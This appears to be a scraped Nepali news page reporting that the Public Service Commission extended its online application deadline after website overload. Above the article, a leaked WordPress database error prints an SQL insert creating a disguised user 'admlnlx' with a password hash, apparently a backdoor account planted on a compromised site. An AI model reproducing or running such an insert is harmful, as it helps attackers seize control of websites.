WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B.5rPSPPiLQ6xJoTGSpEjnW3cCGdN6/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 00:43:08', '', 'admlnlx', 'admlnlx')
काठमाडौं माघ, १८-
लोकसेवा आयोगको वेबसाइटमा समस्या आएपछि नायब सुब्बा पदका लागि अनलाइन आवेदन फारम भर्ने म्याद थप गरिएको छ ।हाल लोकसेवा आयोगले आवेदन फारम अनलाइनबाटै लिने व्यवस्था मिलाएको छ । तर, तीन दिनदेखि वेबसाइटमा समस्या आएपछि आवेदकहरु मर्कामा परेका थिए ।
आयोगका प्रवक्ता लक्ष्मीविलास कोइरालाले आवेदकहरुको समस्यालाई मध्यनजर गर्दै तीन दिन म्याद थप गरिएको जानकारी दिए । ‘लास्ट आवरमा फारम भर्ने हाम्रो बानीले गर्दा सिस्टममा लोड बढी भयो,’ कोइरालाले भने, ‘त्यसैले २१ गतेसम्म फारम भर्ने म्याद थप गरेका छौं ।’
अन्तिम समयमा देशभरबाट अनलाइन आवेदन फारम भर्नेहरुको ‘फ्लो’ बढेकाले वेबसाइटमा समस्या आएको उनले बताए ।गत पुसको अन्तिम बुधबार लोकसेवा आयोगले नायब सुब्बा पदका लागि आवेदन फारम खोलेको थियो । फारम भर्ने अन्तिम म्याद आज मंगलबारसम्म थियो । तर, दोब्बर दस्तुर तिरेर फारम भर्ने म्याद भने माघ २५ गतेसम्म थियो ।वेबसाइटमा आएको समस्याका कारण अब दोब्बर दस्तुर तिरेर फारम बुझाउने म्याद पनि २८ गतेसम्म लम्बिएको छ ।